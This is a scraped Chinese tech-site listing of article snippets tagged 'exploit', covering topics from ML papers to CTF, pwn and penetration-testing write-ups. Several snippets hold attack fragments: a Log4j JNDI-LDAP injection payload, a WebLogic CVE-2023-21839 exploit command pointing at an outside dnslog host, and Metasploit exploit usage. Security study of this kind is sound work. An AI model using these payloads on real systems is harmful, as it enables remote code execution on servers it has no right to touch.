E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
exploit
Classes Matter: A Fine-grained Adversarial Approach to Cross-domain Semantic Segmentation
一、核心贡献Tofully
exploit
thesupervisioninthesourcedomain,weproposeafine-grainedadversariallearningstrategyforclass-levelfeaturealignmentwhilepreservingtheinternalstructureofsemanticsacrossdomains.Weadoptaf
LemonLee
·
2023-09-05 02:31
ctfshow—web—Log4j复现
log4j的payload是:${jndi:ldap://}这里选取的工具是:JNDI
Exploit
利用的话需要有一个vps,poc是:user=${jndi:ldap://0.0.0.0:138
Wcbddd
·
2023-09-05 01:20
web
CTF
log4j
1.pwn基础总结
基本概念:●
exploit
●用于攻击的脚本与方案(通常缩写为exp)●payload●攻击载荷,是的目标进程被劫持控制流的数据●shellcode调用攻击目标的shell的代码(打开目标的shell),
爱码蔡蔡子
·
2023-09-04 08:05
PWN
linux
DPG算法
这就导致只能做
exploit
ation而不能做exploratio
Mariooooooooooo
·
2023-09-04 02:21
强化学习
算法
CVE-2023-21839 Weblogic未授权RCE
exe先试试dnslog:CVE-2023-21839.exe-ip116.xx.xx.xx-port7001-ldapldap://whoami.eduvck.dnslog.cn/aa然后使用JNDI
Exploit
番茄酱料
·
2023-09-03 00:34
CVE
web安全
网络安全
cmu440(10) Fault Tolerance, Logging and recovery
真实系统(通常不可靠)我们迄今为止忽略了失败容错的基本概念https://en.wikipedia.org/wiki/Algorithms_for_Recovery_and_Isolation_
Exploit
ing_Semanticshttps
lqsss
·
2023-09-02 06:34
记一次Zip Slip任意文件写漏洞 以及一些参考文章
任意文件写漏洞以及参考文章们记一次ZipSlip任意文件写漏洞漏洞复现漏洞原理分析扩展延申参考文章一:Java之解压流(ZipInputStream)参考文章二:ZipSlipVulnerability
Exploit
ableApplicationFlowAreyouVulnerable
坦笑&&life
·
2023-08-31 19:23
网络安全
公开
网络安全
7-zip
Linux
ux
MSF应用
MSF应用实验环境操作机:kali靶机:win7实验原理MSF基础使用1、漏洞模块利用进入框架:msfconsole使用search命令查找相关漏洞:searchms17-010使用use进入模块:use
exploit
LOST P
·
2023-08-30 05:16
测试工具
安全性测试
3.2 定位shellcode
这样做的弊端:由于动态链接库的载入和卸载等原因,WIndows进程的函数栈帧可能产生“移位”,即shellcode在内存中的位置可能会动态变化,那么采用将返回地址简单的覆盖成一个定值可能不会让
exploit
PT_silver
·
2023-08-29 13:50
0day安全
系统安全
安卓渗透测试安装笔记 - Drozer安装
drozer可以帮助App和设备变得更安全,其提供了很多Android平台下的渗透测试
exploit
供你使用和分享。对于远程的
exploit
,它可以生成shellcode帮助你进行远程设备管理。
Fer_David
·
2023-08-28 16:03
安全工具
android
java
apache
Metasploit渗透测试1
:术语介绍:术语漏洞Vulnerability渗透测试PenatrationTest权限提升PrivilegeEscalation攻击载荷Payload免杀Anti-AntiVirus后渗透Post-
Exploit
ation
吉米_
·
2023-08-26 02:03
渗透测试
安全
web安全
网络
网络安全
红队测试常用的30个名词
命令执行权限绕过缓冲区溢出注入解析弱口令信息泄露时间分类:0day1dayNday等CVE通用漏洞建立了跨组织跨厂商的通用漏洞沟通语言poc概念验证对某些想法的一个较短而不完整的实现,验证漏洞存在,不能对漏洞造成实质性的利用
exploit
chenguoan-cga
·
2023-08-25 17:08
红队测试
安全
内网渗透的思路与方法总结
Reconnaisance)收集攻击目标的信息武器化阶段(Weaponization)构建可以使用的攻击工具,可以说是广义角度的渗透传递阶段(Delivery)通过某种方法将攻击工具发送到攻击目标利用阶段(
Exploit
ation
四维虫虫
·
2023-08-24 19:23
[2000]MS Windows IIS Unicode Remote Transversal Bug
/*iisexiis
exploit
(**grtzto:Bio,nos,zoa,regandvor...(whoelsewouldstayup*atnightto
exploit
this?)
ZenQdo
·
2023-08-22 12:47
milw0rm
iis
windows
cmd
struct
command
traversal
ctfshow-Log4j复现-log4j复现
1、买VPS,打开mobax进行ssh连接,开两个终端一个终端开启监听另一个终端进入JNDI
Exploit
-1.2-SNAPSHOT.jar所在的目录jndi
exploit
执行下面命令java-jarJNDI
Exploit
Wrypot
·
2023-08-22 07:08
Web漏洞
log4j
WIFI WPA/WPA2加密方式
需要设置Monitor模式1.7监听感兴趣的无线网络1.8得到握手包1.9获取密码1.1准备无线网卡注意kail支持的哪些芯片的无线网卡1.2无线网卡接入虚拟机1.3查看无线网卡信息root@KALI-
EXPLOIT
爬也要爬着前进
·
2023-08-22 05:19
网络安全
网络
20230821流量分析随笔01
貌似gayhub也能搜到“
Exploit
PcapCollection”项目。
12306Br0
·
2023-08-22 02:31
wireshark
安全威胁分析
黑客拍卖”访问权限“,最高要价 12 万美金
“昂贵”的网络访问权限威胁情报公司Flare的研究人员在俄语黑客论坛
Exploit
上分析IAB三个月(5月1日-7月27日)内的报价,以便更好了解黑客
FreeBuf_
·
2023-08-21 22:40
web安全
【kernel
exploit
】CVE-2019-15666 xfrm UAF 8字节写NULL提权分析
文章首发于安全客:CVE-2019-15666xfrmUAF8字节写NULL提权分析CVE-2019-15666是个被低估的漏洞,NVD给的评分只有4.4分。但是2020年5月份,据外媒报道,英国、德国、瑞士和西班牙等国超级计算机中心纷纷报告被加密货币恶意软件感染,导致多个高性能计算集群关闭。根据英国网络安全公司CadoSecutiry调查分析,黑客很有可能是通过利用非法得来的SSH凭证获得了超级
bsauce
·
2023-08-17 05:59
金山软件wps2012-2013通杀0day
/usr/bin/python#
Exploit
Title:KingsoftOfficeWriterv20128.1.0.3385.wpsBufferOverflow
Exploit
(SEH)#Version
weixin_30907935
·
2023-08-16 05:19
HTB-Sandworm
HTB-Sandworm立足altas->silentobserversilentobserver->完整的atalsatlas->root
exploit
扫描最常用的1000个端口。
永远是深夜有多好。
·
2023-08-15 06:48
HTB
其他
新的攻击方式:利用微软跨租户同步功能进行攻击
EmergingAttacker
Exploit
:MicrosoftCross-TenantSynchronizationAttackerscontinuetotargetMicrosoftidentitiestogainaccesstoconnectedMicrosoftapplicationsandfederatedSaaSapplications.Additionally
himobrinehacken
·
2023-08-14 16:23
the
hacker
box
网络安全
安全
系统安全
web安全
Exploit
ing Proximity-Aware Tasks for Embodied Social Navigation 论文阅读
论文信息题目:
Exploit
ingProximity-AwareTasksforEmbodiedSocialNavigation作者:EnricoCancelli,TommasoCampari来源:arXiv
玛卡巴卡_qin
·
2023-08-13 05:14
论文
Navigation
论文阅读
Metasploit Framework(MSF)基础框架
EXP:
Exploit
,利用,利用系统漏洞进行攻击的动作、方式、方
- Time
·
2023-08-11 09:22
工具使用
网络
安全
服务器
【kernel
exploit
】CVE-2017-5123 null任意地址写漏洞
影响版本:小于Linuxv4.14-rc5。Linuxv4.14-rc5和Linuxv4.14.1已修补,Linuxv4.14-rc4未修补。测试版本:Linuxv4.14-rc4测试环境下载地址编译选项:CONFIG_SLAB=yGeneralsetup--->ChooseSLABallocator(SLUB(UnqueuedAllocator))--->SLAB在编译时将.config中的CO
bsauce
·
2023-08-10 07:56
Linux Privilege Escalation Kernel
Exploit
s | Linux本地内核提权漏洞复现 CVE-2015-1328
LinuxPrivilegeEscalationKernel
Exploit
s|Linux本地内核提权漏洞复现CVE-2015-1328文章目录LinuxPrivilegeEscalationKernel
Exploit
s
ImShadowven
·
2023-08-10 06:06
漏洞复现
linux
docker
运维
网络安全
服务器
XXE(外部实体注入)| PortSwigger(burpsuite官方靶场)| Part 1
开始吧
Exploit
ingXXEusingexternalentitiestoretrievefiles(利用外
sayo.
·
2023-08-09 04:31
bp
web安全
安全
XXE
网络安全
xml
机器学习风险评估_5种常见的机器学习安全风险以及如何克服它们
Istillrememberthedayswhenthesoftwaredevelopmentindustrywasinitsinfancy.Manypeoplewereconcernedaboutsoftwarevulnerabilitiesand
exploit
s
weixin_26722031
·
2023-08-08 18:40
机器学习
python
人工智能
java
算法
人工智能研究的主流方法
符号主义人工智能(SymbolicAI)为核心的逻辑推理数据驱动(data-driven)为核心的机器学习探索与利用(explorationand
exploit
ation)为核心的强化学习人工智能主流三种方法区别学习模式优势不足用规则教与人类逻辑推理相似
迎风布阵x
·
2023-08-08 01:22
searchsploit漏洞查找工具使用指南(
exploit
-db.com 离线工具
exploit
db)
什么是SearchSploit:“searchsploit”是一个用于
Exploit
-DB的命令行搜索工具,它还允许你随身带一份
Exploit
-DB的副本。
whatday
·
2023-08-07 11:08
metasploit常用模块使用命令-信息收集
查询此模块下的攻击模块use查询出来的攻击模块//加载攻击模块showoptions//查看一下该模块需要配置的选项参数setRHOSTS192.168.20.20//使用set命令将RHOSTS设置为目标电脑的IP
exploit
ApacheShiro
·
2023-08-03 22:14
Stable Diffusion - 超分辨率插件 StableSR v2 (768x768) 配置与使用
欢迎关注我的CSDN:https://spike.blog.csdn.net/本文地址:https://spike.blog.csdn.net/article/details/131582734论文:
Exploit
ingDiffusionPriorforReal-WorldImageSuper-ResolutionStableSR
SpikeKing
·
2023-08-01 14:28
Stable
Diffusion
AIGC
stable
diffusion
超分辨率
stablesr
2022-05-20 buffer overflow attack
/usr/bin/perluseIO::Select;useIO::Socket::INET;$|=1;print"Remote
Exploit
Example";print"by0x00pffor0x00sec
linuxScripter
·
2023-08-01 04:06
为什么强化学习的探索策略是随机选择动作?
用来平衡探索和利用(tradeoffexplorationand
exploit
ation),这类问题是多臂老虎机中要解决的经典问题。
小小何先生
·
2023-07-30 19:41
MSF使用教程
2.MSF模块介绍1.辅助模块auxiliary负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能2.渗透攻击模块
exploit
s利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法
天猫来下凡
·
2023-07-30 17:42
渗透测试
工具使用
内网渗透
web安全
网络安全-防御需知
目录网络安全-防御1.网络安全常识及术语资产漏洞0day1day后门
exploit
APT2.什么会出现网络安全问题?
赛sir
·
2023-07-30 08:01
php
web安全
开发语言
【kernel
exploit
】CVE-2022-0995 堆溢出1比特置1漏洞利用
测试版本:Linux-5.16.14(利用失败)改用v5.11.22
exploit
及测试环境下载地址—https://github.com/bsauce/kernel-
exploit
-factory编译选项
bsauce
·
2023-07-29 11:54
MSF内网渗透系列2-权限提升
权限提升1.提高程序运行级别2.UAC绕过3.利用提权漏洞进行提权提高程序运行级别msf模块>
exploit
/windows/local/ask但会触发UAC,只有当用户同意是才能获得更高权限5meterpreterx64
YEmooX
·
2023-07-26 12:18
浏览器访问任何网页或功能出现 STATUS_STACK_BUFFER_OVERRUN 错误解决方式
解决方式:1、搜索
Exploit
Protection并打开2、切换到程序设置,点击添加程序进行自定义,选择按程序名称添加3、chrome浏览器输入chrome.exe,e
わたしわ
·
2023-07-26 06:02
chrome
前端
ctfshow web入门 内网渗透篇
先看下445端口,靶机给我们提供了msf,所以直接用msf打下Sambamsfconsoleuse
exploit
/linux/samba/is_known_pipenamesetrhostx.x.x.x
exploit
yu22x
·
2023-07-25 20:10
php
ctf
网络安全基础知识解析:了解常见的网络攻击类型、术语及其防范方法
目录1、网络安全常识和术语1.1资产1.2网络安全1.3漏洞1.40day1.51day1.6后门1.7
exploit
1.8攻击1.9安全策略1.10安全机制1.11社会工程学2、为什么会出现网络安全问题
未知百分百
·
2023-07-25 02:44
安全
网络
防御
web安全
安全
网络安全
网络协议
网络
【kali控制Windows】
msfvenom-pwindows/meterpreter/reverse_tcplhost=iplport=监听端口-fexe>/root/muma1.exe2.metasploit渗透metasploit3.使用
exploit
小小鸟敲代码
·
2023-07-23 15:24
kali
P-tuning:自动构建模版,释放语言模型潜能
不,BERT的MLM模型也能小样本学习中,我们介绍了一种名为Pattern-
Exploit
ingTraining(PET)的方法,它通过人工构建的模版与BERT的MLM模型结合,能够起到非常好的零样本、
PaperWeekly
·
2023-07-21 22:15
机器学习
人工智能
深度学习
编程语言
计算机视觉
现代Linux操作系统的栈溢出
system/24177.html转载请注明原作者和原文地址译者注:本文源自《[细节剖析]XWindows中一个22年的漏洞》中提到的一篇文章,即如何溢出有保护机制的linux,路径如下:http://www.
exploit
-db.com
Letcos
·
2023-07-20 14:25
LinkNet分割模型搭建
原论文:LinkNet:
Exploit
ingEncoderRepresentationsforEfficientSemanticSegmentation直接步入正题~~~一、LinkNet1.decoder
有温度的AI
·
2023-07-20 10:25
深度学习
人工智能
pytorch
神经网络
python
[读论文]---[高效COD] DGNet:Deep Gradient Learning for Efficient CamouflagedObject Detection
Thispaperintroducesdeepgradientnetwork(DGNet),anoveldeepframeworkthat
exploit
sobjectgradientsupervisionforcamouflagedobjectdetection
计算机视觉-Archer
·
2023-07-20 08:08
目标检测
人工智能
计算机视觉
机器学习探索者-利用者策略笔记
探索者-利用者策略(Exploration-
Exploit
ationStrategy)是一种在决策问题中常用的方法。它适用于需要在已知信息和未知信息之间进行权衡的情况,尤其是在资源有限的情况下。
Aresiii
·
2023-07-19 09:48
机器学习
机器学习
算法
人工智能
【PWN】unlink
exploit
堆机制当一个smallchunk被free掉时,会有如下操作:检查是否能向后合并,如果相邻低位的chunk也处于被free的状态,则向后合并。合并两个chunk的内存修改当前chunk指针为前一个chunk指针触发unlink操作将前一个chunk从双向链表(bin)中移除检查是否能向前合并,如果相邻高位的chunk处于被free的状态,则向前合并,同样能出发unlink操作。unlink的操作为
y4ngyy
·
2023-07-18 21:01
【bsauce读论文】 Playing for K(H)eaps: Understanding and Improving Linux Kernel
Exploit
Reliability-US...
1.简介主要内容:分析现有的
exploit
ationstabilization技术,回答以下问题:(1)野外最常用的利用稳定技术是什么?(2)漏洞专家对这些技术的观点是什么,是否正确?
bsauce
·
2023-07-18 11:12
linux提权总结
2016-5195metasploitlinux提权SUID提权passwd提权ssh密钥提权环境变量劫持提权john破解root密文计划任务提权(cronJobs)提权脚本LinEnumlinux-
exploit
-suggester2linuxprivcheckerdocker
coleak
·
2023-07-18 04:24
#
渗透测试
linux
运维
系统安全
web安全
网络安全
上一页
2
3
4
5
6
7
8
9
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他